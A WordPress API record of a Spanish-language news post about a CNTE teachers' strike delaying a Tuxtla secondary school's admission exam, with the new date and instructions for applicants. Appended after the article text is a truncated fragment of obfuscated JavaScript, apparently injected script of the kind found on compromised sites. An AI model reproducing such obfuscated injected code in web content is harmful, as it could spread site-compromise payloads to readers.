{"id":16008,"date":"2024-06-10T01:57:22","date_gmt":"2024-06-10T01:57:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16008"},"modified":"2024-06-10T01:57:22","modified_gmt":"2024-06-10T01:57:22","slug":"paro-de-la-cnte-afecta-examenes-de-admision","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16008","title":{"rendered":"Paro de la CNTE afecta ex\u00e1menes de admisi\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"639\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1717984559243-639x1024.jpg\" alt=\"\" class=\"wp-image-16009\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1717984559243-639x1024.jpg 639w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1717984559243-187x300.jpg 187w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1717984559243.jpg 720w\" sizes=\"auto, (max-width: 639px) 100vw, 639px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores<br>A 26 d\u00edas del paro magisterial y plant\u00f3n encabezado por la Secci\u00f3n 7 de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (CNTE) las afectaciones contin\u00faan y una de ellas es la reprogramaci\u00f3n que han tenido que hacer las diferentes instituciones de la aplicaci\u00f3n de los ex\u00e1menes de admisi\u00f3n.<\/p>\n\n\n\n<p>Uno de esos casos, es el de la Escuela Secundaria Adolfo L\u00f3pez Mateos, localizada en el coraz\u00f3n de Tuxtla que dio una nueva fecha para la aplicaci\u00f3n del examen de admisi\u00f3n.<\/p>\n\n\n\n<p>Cabe recordar que, la primera fecha tuvo que ser suspendida, era el pasado lunes 27 de mayo, debido a que la CNTE \u201cclausur\u00f3\u201d la escuela con mantas y sellos.<\/p>\n\n\n\n<p>El director de la instituci\u00f3n, Javier Santiago Gonz\u00e1lez Laguna confirm\u00f3 que la aplicaci\u00f3n del examen de admisi\u00f3n para los alumnos nuevos ingreso ser\u00e1 el mi\u00e9rcoles 12 de junio pr\u00f3ximo.<\/p>\n\n\n\n<p>Inform\u00f3 que, el d\u00eda del examen los aspirantes deber\u00e1n estar en la escuela a las 7:30 de la ma\u00f1ana; llevar un l\u00e1piz N\u00ba2, sacapuntas, borrador y su ficha original del examen de admisi\u00f3n.<\/p>\n\n\n\n<p>Cabe recordar que la secundaria Adolfo L\u00f3pez Mateos no fue la \u00fanica escuela que tomaron los agremiados a la CNTE, por lo que a\u00fan est\u00e1n por confirmarse las nuevas fechas del examen de admisi\u00f3n para cada una de las escuelas de la entidad que tuvieron esa misma situaci\u00f3n.<\/p>\n\n\n\n<p>El director precis\u00f3 que: \u201cLuego del examen vamos a dar los resultados el d\u00eda lunes 24 de junio a partir de las 12:00 horas en la p\u00e1gina de Facebook de la escuela\u201d.<\/p>\n\n\n\n<p>Con este tipo de acciones, la coordinadora se ha ganado el repudio generalizado de la poblaci\u00f3n que ha padecido los estragos de estas acciones radicales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo FloresA 26 d\u00edas del paro magisterial y plant\u00f3n encabezado por la Secci\u00f3n 7 de la Coordinadora Nacional de Trabajadores de la Educaci\u00f3n (CNTE) las afectaciones contin\u00faan y una de ellas es la reprogramaci\u00f3n que han tenido que hacer las diferentes instituciones de la aplicaci\u00f3n de los ex\u00e1menes de admisi\u00f3n. Uno de esos casos, es &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16009,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-16008","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16008","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16008"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16008\/revisions"}],"predecessor-version":[{"id":16010,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16008\/revisions\/16010"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16009"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16008"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16008"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16008"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}